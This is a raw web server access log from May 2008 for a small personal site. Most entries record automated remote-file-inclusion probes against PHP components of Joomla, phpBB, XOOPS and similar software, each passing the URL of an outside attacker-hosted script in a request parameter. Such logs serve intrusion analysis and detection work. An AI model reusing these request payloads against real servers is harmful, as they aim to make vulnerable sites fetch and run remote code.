67.195.37.115 - - [25/May/2008:09:10:42 -0700] "GET /blog/index.php/comments/feed/ HTTP/1.0" 200 3129 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
62.110.249.70 - - [25/May/2008:09:10:50 -0700] "GET /logs/access_080218.log//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.comova.org.br/www/media/a2id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.89.22.139 - - [25/May/2008:09:11:22 -0700] "GET /logs/access_080219.log//include.php?path[docroot]=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.22.139 - - [25/May/2008:09:11:22 -0700] "GET //include.php?path[docroot]=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.22.139 - - [25/May/2008:09:11:22 -0700] "GET /logs//include.php?path[docroot]=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.22.139 - - [25/May/2008:09:11:27 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.22.139 - - [25/May/2008:09:11:27 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.218.85.18 - - [25/May/2008:09:12:08 -0700] "GET /logs/access_080330.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://mykonos.bargaingreece.com//components/com_log/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.89.22.139 - - [25/May/2008:09:12:13 -0700] "GET /logs/access_080223.log/index.php?body=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.22.139 - - [25/May/2008:09:12:18 -0700] "GET /logs/index.php?body=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.22.139 - - [25/May/2008:09:12:20 -0700] "GET /index.php?body=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.812" "www.dmulk.com"
66.7.193.199 - - [25/May/2008:09:12:22 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.aula-verde.com.ar//media/cmd? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
66.7.193.199 - - [25/May/2008:09:12:22 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.aula-verde.com.ar//media/cmd? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
82.146.59.231 - - [25/May/2008:09:12:45 -0700] "GET /logs/access_080215.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.146.59.231 - - [25/May/2008:09:12:45 -0700] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.146.59.231 - - [25/May/2008:09:12:46 -0700] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.89.22.139 - - [25/May/2008:09:14:25 -0700] "GET /logs/access_080225.log/index.php?body=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
207.7.108.240 - - [25/May/2008:09:14:37 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.103.23.40 - - [25/May/2008:09:15:36 -0700] "GET /logs/access_071227.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.parcheggi.it/aziendaimg/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.103.23.40 - - [25/May/2008:09:15:36 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.parcheggi.it/aziendaimg/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.103.23.40 - - [25/May/2008:09:15:37 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.parcheggi.it/aziendaimg/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.127.70.91 - - [25/May/2008:09:15:50 -0700] "GET /logs/access_080207.log//skin/zero_vote/ask_password.php?dir=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.127.70.91 - - [25/May/2008:09:15:50 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.127.70.91 - - [25/May/2008:09:15:50 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.103.23.40 - - [25/May/2008:09:15:52 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.parcheggi.it/aziendaimg/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.127.70.91 - - [25/May/2008:09:15:52 -0700] "GET /logs/access_080207.log//skin/zero_vote/ask_password.php?dir=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.127.70.91 - - [25/May/2008:09:15:52 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.127.70.91 - - [25/May/2008:09:15:53 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.89.22.139 - - [25/May/2008:09:16:06 -0700] "GET /logs/access_080215.log/index.php?redir=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
83.103.23.40 - - [25/May/2008:09:16:09 -0700] "GET /logs/access_080130.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.parcheggi.it/aziendaimg/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.89.22.139 - - [25/May/2008:09:16:11 -0700] "GET /logs/index.php?redir=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.22.139 - - [25/May/2008:09:16:14 -0700] "GET /index.php?redir=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.812" "www.dmulk.com"
74.55.53.226 - - [25/May/2008:09:16:33 -0700] "GET /logs/access_080218.log//errors.php?error=http://myhelderberg.com/auction//phpAdsNew/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.127.70.91 - - [25/May/2008:09:16:40 -0700] "GET /logs/access_071215.log//skin/zero_vote/ask_password.php?dir=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.127.70.91 - - [25/May/2008:09:16:50 -0700] "GET /logs/access_071215.log//skin/zero_vote/ask_password.php?dir=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.59.147.59 - - [25/May/2008:09:17:02 -0700] "GET /plugins/payment/secpay/secpay.inc.php?config%5broot_dir%5d=http://ma2day.t35.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.3.139.169 - - [25/May/2008:09:17:10 -0700] "GET /logs/access.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.3.139.169 - - [25/May/2008:09:17:10 -0700] "GET /logs/access.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.3.139.169 - - [25/May/2008:09:17:10 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.3.139.169 - - [25/May/2008:09:17:10 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.3.139.169 - - [25/May/2008:09:17:10 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.3.139.169 - - [25/May/2008:09:17:11 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.3.139.169 - - [25/May/2008:09:17:12 -0700] "GET /logs/access.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.3.139.169 - - [25/May/2008:09:17:12 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.3.139.169 - - [25/May/2008:09:17:12 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.89.22.139 - - [25/May/2008:09:17:23 -0700] "GET /logs/access_080207.log//include.php?path[docroot]=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.22.139 - - [25/May/2008:09:17:39 -0700] "GET /logs/access_080207.log/config.php?path_to_root=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.22.139 - - [25/May/2008:09:17:39 -0700] "GET /config.php?path_to_root=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.22.139 - - [25/May/2008:09:17:39 -0700] "GET /logs/config.php?path_to_root=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.22.139 - - [25/May/2008:09:17:41 -0700] "GET /logs/access_080219.log//include.php?path[docroot]=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.22.139 - - [25/May/2008:09:17:41 -0700] "GET //include.php?path[docroot]=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.22.139 - - [25/May/2008:09:17:41 -0700] "GET /logs//include.php?path[docroot]=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.22.139 - - [25/May/2008:09:17:47 -0700] "GET /logs/access_080213.log/config.php?path_to_root=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
217.160.203.190 - - [25/May/2008:09:18:09 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://medisana.co.kr/test? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.18.57 - - [25/May/2008:09:18:09 -0700] "GET /bikes/CreSTOC07/?M=D HTTP/1.0" 200 15280 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
69.89.25.171 - - [25/May/2008:09:18:28 -0700] "GET /logs/access_080207.log//skin/zero_vote/ask_password.php?dir=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.25.171 - - [25/May/2008:09:18:28 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.25.171 - - [25/May/2008:09:18:28 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
217.160.203.190 - - [25/May/2008:09:18:29 -0700] "GET /logs/access_080330.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://medisana.co.kr/test? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.160.203.190 - - [25/May/2008:09:18:29 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://medisana.co.kr/test? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.89.25.171 - - [25/May/2008:09:18:58 -0700] "GET /logs/access_071215.log//skin/zero_vote/ask_password.php?dir=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
85.214.32.233 - - [25/May/2008:09:19:12 -0700] "GET //component/option,com_sitemap/Itemid,92/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.spices.res.in/biotraineeship.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.89.25.171 - - [25/May/2008:09:19:44 -0700] "GET /logs/access_080312.log/[Scripthttp://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.25.171 - - [25/May/2008:09:19:44 -0700] "GET /[Scripthttp://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.25.171 - - [25/May/2008:09:19:44 -0700] "GET /logs/[Scripthttp://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.25.171 - - [25/May/2008:09:20:07 -0700] "GET /logs/access_080219.log/[Scripthttp://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
85.227.184.65 - - [25/May/2008:09:20:08 -0700] "GET /logs/access_080327.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://spyxx.iespana.es/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.15.48.60 - - [25/May/2008:09:20:14 -0700] "GET /logs/access_080117.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
67.15.48.60 - - [25/May/2008:09:20:14 -0700] "GET /logs/access_080117.log/errors.php?error=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
67.15.48.60 - - [25/May/2008:09:20:15 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
67.15.48.60 - - [25/May/2008:09:20:15 -0700] "GET /errors.php?error=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
67.15.48.60 - - [25/May/2008:09:20:15 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
67.15.48.60 - - [25/May/2008:09:20:15 -0700] "GET /logs/errors.php?error=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
69.89.22.139 - - [25/May/2008:09:20:21 -0700] "GET /logs/access_080121.log/index.php?redir=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
85.227.184.65 - - [25/May/2008:09:20:33 -0700] "GET /logs/access_080218.log/errors.php?error=http://spyxx.iespana.es/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.227.184.65 - - [25/May/2008:09:20:33 -0700] "GET /errors.php?error=http://spyxx.iespana.es/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.227.184.65 - - [25/May/2008:09:20:33 -0700] "GET /logs/errors.php?error=http://spyxx.iespana.es/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.17.103.109 - - [25/May/2008:09:21:52 -0700] "GET /logs/access.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
85.17.103.109 - - [25/May/2008:09:21:52 -0700] "GET /logs/access.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
85.17.103.109 - - [25/May/2008:09:21:52 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
85.17.103.109 - - [25/May/2008:09:21:52 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
85.17.103.109 - - [25/May/2008:09:21:52 -0700] "GET /logs/access.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
85.17.103.109 - - [25/May/2008:09:21:53 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
85.17.103.109 - - [25/May/2008:09:21:53 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
85.17.103.109 - - [25/May/2008:09:21:53 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
85.17.103.109 - - [25/May/2008:09:21:53 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
82.149.231.145 - - [25/May/2008:09:22:21 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.53.170.223 - - [25/May/2008:09:22:22 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.53.170.223 - - [25/May/2008:09:22:22 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
161.58.178.229 - - [25/May/2008:09:22:22 -0700] "GET /logs/errors.php?error=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
161.58.178.229 - - [25/May/2008:09:22:22 -0700] "GET /errors.php?error=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
161.58.178.229 - - [25/May/2008:09:22:36 -0700] "GET /logs/errors.php?error=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
161.58.178.229 - - [25/May/2008:09:22:36 -0700] "GET /errors.php?error=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.149.231.145 - - [25/May/2008:09:22:37 -0700] "GET /logs/access_080123.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.149.231.145 - - [25/May/2008:09:22:37 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.149.231.145 - - [25/May/2008:09:22:38 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
189.140.12.250 - - [25/May/2008:09:22:50 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.cricketsecrets.com/RSS2B/settings/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
189.140.12.250 - - [25/May/2008:09:22:50 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.cricketsecrets.com/RSS2B/settings/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.53.226 - - [25/May/2008:09:22:52 -0700] "GET //errors.php?error=http://myhelderberg.com/auction//phpAdsNew/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.176 - - [25/May/2008:09:23:11 -0700] "GET /logs/access_080306.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.weber-computerdienst.de/extern/unikat-bensheim/newswriter_sw_1_3/include/ateam.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.176 - - [25/May/2008:09:23:11 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.weber-computerdienst.de/extern/unikat-bensheim/newswriter_sw_1_3/include/ateam.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.176 - - [25/May/2008:09:23:12 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.weber-computerdienst.de/extern/unikat-bensheim/newswriter_sw_1_3/include/ateam.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.111.178 - - [25/May/2008:09:23:40 -0700] "GET /logs/access_080327.log/admin/classes/TplLoad.php?full_path_to_public_program=http://kclarkes.t35.com/cd/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.12.32.214 - - [25/May/2008:09:23:40 -0700] "GET /logs/access_071215.log//skin/zero_vote/ask_password.php?dir=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.89.22.139 - - [25/May/2008:09:23:52 -0700] "GET /logs/access_080207.log//include.php?path[docroot]=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.188.60.54 - - [25/May/2008:09:23:58 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
189.140.12.250 - - [25/May/2008:09:23:59 -0700] "GET /logs/access_080213.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.cricketsecrets.com/RSS2B/settings/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.188.60.54 - - [25/May/2008:09:24:05 -0700] "GET /logs/access_080330.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.188.60.54 - - [25/May/2008:09:24:05 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.47.80.39 - - [25/May/2008:09:24:11 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.dmulk.com"
69.89.25.171 - - [25/May/2008:09:24:12 -0700] "GET /logs/[Scripthttp://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
193.47.80.39 - - [25/May/2008:09:24:12 -0700] "GET /logs/ HTTP/1.1" 200 48986 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.dmulk.com"
